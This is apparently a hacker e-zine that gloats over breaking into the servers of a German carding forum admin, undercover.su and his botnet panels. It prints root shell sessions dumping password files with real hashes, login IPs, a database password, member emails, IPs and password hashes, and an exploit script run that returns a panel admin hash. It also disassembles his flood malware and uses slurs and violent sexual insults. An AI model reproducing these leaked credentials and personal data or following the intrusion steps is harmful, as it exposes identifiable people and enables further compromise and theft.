.-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: erstens | +| k!LLu: entscheide ich ob es ein board gibt oder nich | +|____________________________________________________________________| + +k!LLu decides if a messageboard exists or not! It's no secret that +he is a bit delusional and tends to get stuff mixed up. But, admit +it, his ramblings are kind of fun to read and we look forward to +seeing what he comes up with to explain him being owned and exposed. + ___________________________________________________________________ _ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: profis ???? | +| LOOOOOOOOOL | +| | +| 1337Crew, Public lücke in der SB | +| Carders, Public lücke im SMF | +| Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit | +| | +| scriptkiddys.... nothing serverside... | +| | +| wäre ich früher aufgestanden hätte dort undercover | +| gestanden :/ | +| | +| Die Admins sind einfach zu daemlich.... | +| Crimenetwork -- MostHated&Unhacked | +|____________________________________________________________________| + +k!LLu basically says that 1337crew and carders.cc were hacked with +public exploits by amateurs. He would have done it himself if he +hadn't slept so long. + +The main question here is whether he himself believes this bullshit. +But seriously, he can't be that dumb. Crimenetwork, the predecessor of +undercover.su, was destined to fail from the beginning since k!LLu has +always been trying to create the image of the knowledgeable hacker and +admin he clearly is not. To promote his projects he apparently doesn't +back off from talking about public vulnerabilities that never existed +or exploits he'd never get his hands on. It must be really depressing +to have never even seen or possesed a 0day when one is immensely +desperate to make others believe so. The sad thing actually is that +his constant lying is believed by people incapable of checking simple +facts. But just imagine this poor little guy trying to insult the +hackers who are just watching him typing it, failing to understand +that he is just one of many Trumans in our show. We hope that this +ezine can once and for all depict k!LLu as the cocky kid he is. + +When trying not to puke while surfing Undercover.su we stumbled upon +some rumors. One of which stated that we are Global Evolution - a +private little German fag community that tries to explain security +vulnerabilities by blogging videos about XSS. No we're not Global +Evolution. If anything, we are evolution. We lend a hand to natural +selection, by helping to wipe out the weak ones. And, believe us or +not, k!LLu and his projects deserve to be wiped out more than anybody +or anything else. We keep the show going ... + +# uname -a +FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash +true:*:1003:1003:User &:/home/true:/sbin/nologin +symb:*:1006:1006:User &:/home/symb:/bin/sh +hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin +gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin +relite:*:1007:1007:User &:/home/relite:/bin/sh +wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin +ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin +backspace:*:1005:1005:User &:/home/backspace:/bin/sh +lcf:*:1000:1000:User &:/home/lcf:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash +true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin +symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh +hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin +gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin +relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh +wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin +ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin +backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh +lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh + +# last +ixde ftp 94.220.134.71 Tue Oct 11 17:33 - 17:44 (00:10) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:27 (00:01) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:31 (00:06) +ixde ftp 94.220.134.71 Tue Oct 11 16:37 - 16:41 (00:04) +ixde ftp 94.220.134.71 Tue Oct 11 16:19 - 16:27 (00:07) +ucsu ftp 193.107.17.239 Tue Oct 11 11:31 - 11:32 (00:00) +ixde ftp 94.220.134.71 Mon Oct 10 15:44 - 15:48 (00:03) +ixde ftp 94.220.134.71 Sun Oct 9 20:42 - 20:47 (00:04) +ucsu ftp 77.20.18.64 Sat Oct 8 17:04 - 17:07 (00:03) +ucsu ftp 77.20.18.64 Sat Oct 8 12:57 - 13:00 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:18 - 14:21 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:01 - 14:06 (00:04) +ixde ftp 217.255.238.21 Fri Oct 7 13:56 - 13:58 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:55 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:57 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:51 - 13:52 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:49 - 13:52 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:47 - 13:48 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:45 - 13:48 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:44 - 13:45 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:42 - 13:44 (00:01) +ixde ftp 94.220.134.71 Fri Oct 7 13:40 - 13:46 (00:05) +ixde ftp 217.255.238.21 Fri Oct 7 13:39 - 13:45 (00:05) +backspace ftp 217.23.8.127 Wed Oct 5 11:34 - 11:59 (00:24) +ucsu ftp 77.20.18.64 Tue Oct 4 17:10 - 17:13 (00:03) +backspace ftp 95.128.242.224 Mon Oct 3 22:29 - 22:39 (00:10) +true ftp 77.20.18.64 Mon Oct 3 16:59 - 17:00 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 16:59 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 17:01 (00:03) +true ftp 77.20.18.64 Mon Oct 3 16:54 - 16:57 (00:03) +ixde ftp 94.220.134.71 Mon Oct 3 09:38 - 10:07 (00:29) +ixde ftp 94.220.134.71 Mon Oct 3 09:11 - 09:17 (00:05) +ixde ftp 94.220.134.71 Sun Oct 2 23:04 - 23:04 (00:00) +ixde ftp 94.220.134.71 Sun Oct 2 23:01 - 23:04 (00:03) +ixde ftp 94.220.134.71 Sun Oct 2 22:31 - 22:45 (00:13) +ixde ftp 94.220.134.71 Sun Oct 2 22:29 - 22:45 (00:15) + +# host 77.20.18.64 +64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de. + +# there we go^C + +# cd /home/ucsu + +# ls -la + +total 32 +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 ucsu www 512 May 6 13:08 abuse.undercover.su +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 delict.cc +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 moneymake.us +drwxrwx--- 3 ucsu www 512 Apr 7 2011 scene-sector.to +drwxrwx--- 2 ucsu www 2048 Oct 11 19:57 temp +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 undercover.su + +# cd abuse.undercover.su + +# ls -la + +total 12 +drwxrwx--- 2 ucsu www 512 May 6 13:08 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 1034 May 6 13:08 index.html + +# cd .. +# cd delict.cc + +# ls -la + +total 100 +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 423 Aug 15 23:46 index.php +-rw-r--r-- 1 ucsu www 44909 Aug 16 00:12 mainlogo.png + +# cd .. + +# cd moneymake.us + +# ls -la +total 12 +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 root www 261 Apr 13 13:04 index.php + +# cat index.php +<html> +<head> + +<title>Undercover.SU + + + + + + + +Sie werden weitergeleitet... + +# cd .. + +# cd scene-sector.to + +# ls -la +total 16 +drwxrwx--- 3 ucsu www 512 Apr 7 2011 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 root www 261 Apr 5 2011 index.php +drwxr-xr-x 6 root www 512 Apr 9 2011 test +# cd test + +# ls -la + +total 24 +drwxr-xr-x 6 root www 512 Apr 9 2011 . +drwxrwx--- 3 ucsu www 512 Apr 7 2011 .. +drwxrwxrwx 3 root www 512 Apr 7 2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss +drwxr-xr-x 5 root www 512 Apr 7 2011 admin +drwxr-xr-x 3 root www 512 Apr 7 2011 designe +drwxr-xr-x 3 root www 512 Apr 9 2011 img + +# ls -la +total 15032 +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +drwxr-xr-x 8 root www 512 Apr 30 00:07 .trash +-rw-r--r-- 1 root www 1799843 May 5 18:04 SpyEye.Builder.v1.2.99.zip +-rw-r--r-- 1 root www 320512 Jun 6 20:45 back.exe +-rw-r--r-- 1 root www 118784 Jun 6 14:22 backs.exe +-rw-r--r-- 1 root www 4538223 Jun 6 14:45 backspace.rar +-rw-r--r-- 1 root www 7168 May 11 13:26 elite_4.2.exe +drwxr-xr-x 3 ucsu www 512 Sep 29 18:50 files +-rw-r--r-- 1 ucsu www 408 Feb 6 2011 ico.png +-rw-r--r-- 1 ucsu www 1053 Feb 6 2011 icon_icq.png +-rw-r--r-- 1 ucsu www 536 Aug 21 15:59 index.php +-rw-r--r-- 1 root www 515 May 4 10:00 index.php_ +-rw-r--r-- 1 ucsu www 162 Feb 6 2011 index_.html +drwxr-xr-x 12 ucsu www 512 Sep 27 12:59 ipb3 +drwxr-xr-x 2 root www 512 May 4 09:58 ipboard +drwxr-xr-x 21 root www 1024 Apr 16 16:07 ipboard___beta +-rw-r--r-- 1 ucsu www 25474 Feb 6 2011 logo.jpg +-rw-r--r-- 1 ucsu www 4657 Feb 6 2011 logo.png +-rw-r--r-- 1 root www 44909 May 4 09:53 mainlogo.png +drwxr-xr-x 2 root www 512 Jun 6 14:31 private +-rw-r--r-- 1 root www 253952 May 5 16:32 snap.exe +drwxr-xr-x 3 root www 512 Aug 14 22:01 snapshot +-rw-r--r-- 1 root www 118784 Jun 6 14:39 stansecu.exe +drwxr-xr-x 3 root www 512 May 4 11:15 static +-rw-r--r-- 1 ucsu www 107003 Sep 16 16:20 test.rar +-rw-r--r-- 1 root www 118784 May 18 19:35 v2.exe +-rw-r--r-- 1 root www 118784 May 18 19:35 v3.exe + +# cd private +# ls -la +total 8908 +drwxr-xr-x 2 root www 512 Jun 6 14:31 . +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 .. +-rw-r--r-- 1 root www 4538210 Jun 6 14:32 backspace.rar +-rw-r--r-- 1 root www 44 Jun 6 13:23 index.php + +# cat index.php +Certificate not found. +-- Access prohibited + +Alright, before we continue, lets have a look at some of k!LLu's +enhancements he stated after Undercover.su left its beta status: + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun | +| keine IP Adressen mehr, es ist nahezu unmöglich | +| IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" | +| gespeichert. Alle Beiträge, E-Mail's, Themen und PM's | +| sind unlesbar verschluesselt. Selbst ein Hack wäre nun | +| völlig egal und sinnfrei! | +|____________________________________________________________________| + +As we can see, it clearly should not be possible to take any advantage +of hacking undercover.su because of its highly encrypted database. + +# grep ucsu /var/log/proftpd-transfer.log | tail +Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c +Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c +Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c +Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c + +Seems like undercover.su/ipb3 is the latest version of k!LLu's project + +# cd ipb3 + +# cat conf_global.php + + +# mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 465217 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10; ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| member_id | name | email | ip_address | members_pass_hash | members_pass_salt | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| 1 | s1mpl3x | purplera1n@safe-mail.net | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3= | +| 2 | medi8tor | ace1992@gmx.net | | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H | +| 3 | usrid3 | usrid3@undercover.su | | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI | +| 4 | usrid4 | usrid4@undercover.su | | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ | +| 5 | test | test@mail.de | | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t, | +| 6 | Man4ic | mrajabi@hotmail.de | | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm | +| 7 | bin | binary@secure-mail.biz | | 8ae8499691d35b04442a6ba87a92a9fa | JM;3! | +| 8 | Ixde | angela.krueger@hotmail.de | | 5b7eee531e99f89be45ff928d7e045ab | qfi7X | +| 9 | casy | 76671253@trash-mail.com | | abddc59b20ad591d10b47b02bd70d426 | 4G:(s | +| 10 | soldier16 | musekeule@yahoo.de | | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +10 rows in set (0.00 sec) + +mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1; ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| msg_post | msg_ip_address | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| Meld dich ICQ 83885,
wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,
kann 15k Ukash daily nahezu Instant auscashen | 7 | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# + +WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's driving us insane, +because we thought that hacking Undercover.su would be at least a bit, +a _BIT_, of a challenge. But fucking NO! k!LLu is by far the dumbest +person to be ever slapattacked by us. That's why we were not satisfied +with the simple ownage of Undercover.su and headed over to his other +projects ... + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ k!LLu's Botnet }========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +We could now tell you a story about love and ~ | ||( );, +romance, about people dying and fighting as ( ,;.)-\ / ';, +heroes, about people suffering and crying. But \ ( \ ( +instead, we now shall tell you the story of how || \\ +we raped k!LLu and his little botnet to hell and /_( /_( +back. So here it is: . + / \ + _\ /_ + . . (,'v`.) . . + \) ( ) ,' `. ( ) (/ + \`. / `-' `-' \ ,'/ + : ' _______ ' : + | _,-' ,-. `-._ | + |,' ( )__`-'__( ) `.| + (|,-,'-._ _.-`.-.|) + / /<(o )> <(o )>\ \ + : : | | : : + | | ; : | | ------ k!LLu, thou shall + | | (.-.) | | officially be owned + | | ,' ___ `. | | to fuck. + ; |)/ ,'---'. \(| : + _,-/ |/\( )/\| \-._ + _..--'.-( | `-'''-' | )-.`--.._ + `. ;`._________,': ,' + ,' `/ \'`. + `------.------' + +One thing that has always been connected to k!LLu was the botnet he +kept bragging about. It probably all started back at crimenetwork when +he ddosed competitors to at least get some visitors. Knowing k!LLu, +one would think his botnet was just imaginary like most of the other +things he rambles about. But no, k!LLu actually had a botnet for which +he used his own botsoftware "Snap Reloaded". Unsurprisingly, this +piece of malware is just as bad as most of the other things he has +been working on. If you don't find at least two pre-auth +vulnerabilities within a minute of looking at the panel's source you +must be seriously retarded and it was accordingly easy to break into +his boxes. k!LLu hosts more than one panel most of which are run from +separate VMs and probably belong to some of his customers. In fact +everyone who's hosting their net on k!llu's server is actually +donating bots to k!LLu. He is a master of advertising but +unfortunately, he doesn't take telling the truth too seriously. That's +why we'll take a look into the "Snap Reloaded" bot he is selling. + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] User-Mode (ring3) r00tkit | +| -> [+] run's as a service and hide himself | +| -> [+] hides&protect root process | +| -> [+] hides&protect files | +| -> [+] hides root processes | +| -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz | +| -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz | +| -> [+] hides used regkey''s | +|____________________________________________________________________| + +You don't think k!LLu'd be shameless enough to _invent_ a feature? He +did. Well, at least not a single binary we could get our hands on +showed any signs of a rootkit. A 3-year-old would be able to kill the +process and kick that piece of shit into the trashcan. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] METAMORPHIC architecture | +| -> [+] use random legit process,file & service names | +| -> [+] generate a unique stub every run | +| -> [+] whole software gets metamorph virtualized byte per byte | +|____________________________________________________________________| + +Again, a hardcoded list of processnames, that aren't at all "legit" is +not that cool. And, unsurprisingly, the bot isn't virtualized. But +hey, he used UPX, we give him that. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] webpanel developped with dreamweaver cs5 and own ajax | +| framework using mysql and php | +| -- no ressource wasting jquery/extJS shit like kerber0s, | +| EliteLoader | +| [+] multi theme support | +| [+] multi command support => every victim can do as many threads | +| as you want | +| [+] reliable protocoll which creates the lowest possible server | +| load | +| [+] modularized structure | +| [+] Blocks common Trackers | +| [+] dynamic ConnectionDelay => if server load raises, delay | +| raises and you are able to host over 25000Victims on a little | +| VPS | +|____________________________________________________________________| + +The next thing on the list is the webpanel. It's partially ioncube +encoded but still runs perfectly without even changing anything. As +said above, it's also pretty straight forward to find several vulns in +it. But wait: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] XSS/SQLi Prevention Firewall | +|____________________________________________________________________| + +And we really gotta say: this thing is the shit. Well, of course it +doesn't exist but who'd bother and check anyways? + +$ ./killu_u_r_lame.pl bgate.secure-host.in + bl1ng bl1ng! + admin:76a2173be6393254e72ffa4d6df1030a +$ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Another interessting thing is, thats is the WORLDS FIRST BOT | +| which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8) | +| via DCI and Windows-own Testsigning Mode | +| This allows us again to use half-open connections and rawSockets! | +| and grant us to use things like IP Spoofing or REAL SYNFLOOD ! | +| | +| This is the really awesome part, of this state-of-the-Art Botnet | +| software! DDoS Class is written in pure (m)ASM to get the maximum | +| possible stability and maximum possible Attack-strength/Power. | +| Everyone who says his Bot is stronger, LIES | +| There's NO WAY to get DDoS stronger! | +|____________________________________________________________________| + +Wow, k!LLu talking about people lying, somewhat ironic. Let's have a +look at this badass functions of his. + +[...] +movzx eax, byte ptr [ebp+14] ; | +mov dword ptr [ebp-C], ebx ; | +mov dword ptr [ebp-8], esi ; | +mov esi, dword ptr [ebp+8] ; | +mov byte ptr [ebp-11], al ; | +xor eax, eax ; | +mov dword ptr [ebp-4], edi ; | +mov edi, dword ptr [ebp+C] ; | +movsx ebx, word ptr [ebp+10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 1 ; | +mov dword ptr [esp+4], eax ; | +mov dword ptr [esp], 2 ; | +call near dword ptr [41E0E8] ; \socket +mov dword ptr [esi+190], eax +sub esp, 0C +inc eax ; | +je 004029E6 ; | +movzx eax, bx ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E0] ; \ntohs +mov ecx, 2 +mov word ptr [esi+194], cx +sub esp, 4 +mov word ptr [esi+196], ax ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +inc eax ; | +je 00402A10 ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +mov dword ptr [esi+198], eax +cmp byte ptr [ebp-11], 0 +jnz 00402A02 +mov dword ptr [ebp-10], 1 +lea eax, dword ptr [ebp-10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 8004667E ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0A8] ; \ioctlsocket +mov eax, 10 +sub esp, 0C +mov dword ptr [esp+8], eax ; | +lea eax, dword ptr [esi+194] ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0D8] ; \connect +[...] + +This is an excerpt from his "synflood" function. It's obvious that +creating a new sockaddr structure for every time you call connect is +not efficient at all. He also seems to think setting a socket to +non-blocking mode via ioctlsocket would make his simple tcp flood look +like a synflood. But let's look at the code that calls this from +within the ddos thread and quickly reveals that this is compiler +generated rather than "plain assembly". + +push ebp +mov ebp, esp +[...] +mov eax, dword ptr [41E06C] ; ||| +mov eax, dword ptr [eax+14] ; ||| +mov dword ptr [esp], eax ; ||| +call ; ||\atoi +mov dword ptr [ebp-70], eax ; || +mov eax, dword ptr [41E06C] ; || +mov eax, dword ptr [eax+C] ; || +mov dword ptr [esp], eax ; || +call ; |\atoi +mov dword ptr [ebp-74], eax ; | +mov eax, dword ptr [41E06C] ; | +mov eax, dword ptr [eax+8] ; | +mov dword ptr [esp], eax ; | +call ; \atoi +[...] +mov esi, esi ; plain asm in the hewd +[...] +mov dword ptr [esp], 0 ; | +call ; \ExitThread +[...] + +But don't be too sad, k!LLu. We got some exciting news for you: +userspace ddos code is not the bottleneck. You're probably trying to +get your bots back after we rmd your box but we're afraid we were able +to clean a majority of them up. + +# uname -a +Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux + +# id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin 